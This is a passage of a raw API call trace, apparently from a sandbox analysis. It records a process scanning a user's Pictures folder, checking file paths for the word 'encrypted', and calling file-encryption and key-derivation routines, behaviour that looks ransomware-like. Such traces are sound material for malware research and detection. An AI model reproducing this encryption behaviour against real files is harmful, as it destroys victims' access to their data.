ftCreationTime.dwLowDateTime=0xb9fb7f40, ftCreationTime.dwHighDateTime=0x1d5b788, ftLastAccessTime.dwLowDateTime=0xf44f8ae0, ftLastAccessTime.dwHighDateTime=0x1d5b7a8, ftLastWriteTime.dwLowDateTime=0xf44f8ae0, ftLastWriteTime.dwHighDateTime=0x1d5b7a8, nFileSizeHigh=0x0, nFileSizeLow=0x17198, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SF5U9BKNVl3bd-lE1Z7.gif", cAlternateFileName="SF5U9B~1.GIF")) returned 0x7c20c0 [0040.237] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.237] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fb7f40, ftCreationTime.dwHighDateTime=0x1d5b788, ftLastAccessTime.dwLowDateTime=0xf44f8ae0, ftLastAccessTime.dwHighDateTime=0x1d5b7a8, ftLastWriteTime.dwLowDateTime=0xf44f8ae0, ftLastWriteTime.dwHighDateTime=0x1d5b7a8, nFileSizeHigh=0x0, nFileSizeLow=0x17198, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SF5U9BKNVl3bd-lE1Z7.gif", cAlternateFileName="SF5U9B~1.GIF")) returned 0x7c20c0 [0040.237] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.237] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.237] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SF5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BKNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KNVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NVl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vl3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bd-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lE1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E1Z7.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.240] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.240] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.240] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.240] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.240] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.240] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.240] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.240] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.240] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.240] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fb7f40, ftCreationTime.dwHighDateTime=0x1d5b788, ftLastAccessTime.dwLowDateTime=0xf44f8ae0, ftLastAccessTime.dwHighDateTime=0x1d5b7a8, ftLastWriteTime.dwLowDateTime=0xf44f8ae0, ftLastWriteTime.dwHighDateTime=0x1d5b7a8, nFileSizeHigh=0x0, nFileSizeLow=0x17198, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="SF5U9BKNVl3bd-lE1Z7.gif", cAlternateFileName="SF5U9B~1.GIF")) returned 0x7c2100 [0040.240] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.240] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.241] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.241] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.241] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.241] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.241] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.241] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.241] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.241] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.241] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.241] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.241] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.241] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.241] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.242] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.242] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.242] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.242] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.242] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.242] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.242] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.243] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.243] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.243] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.243] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.243] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, 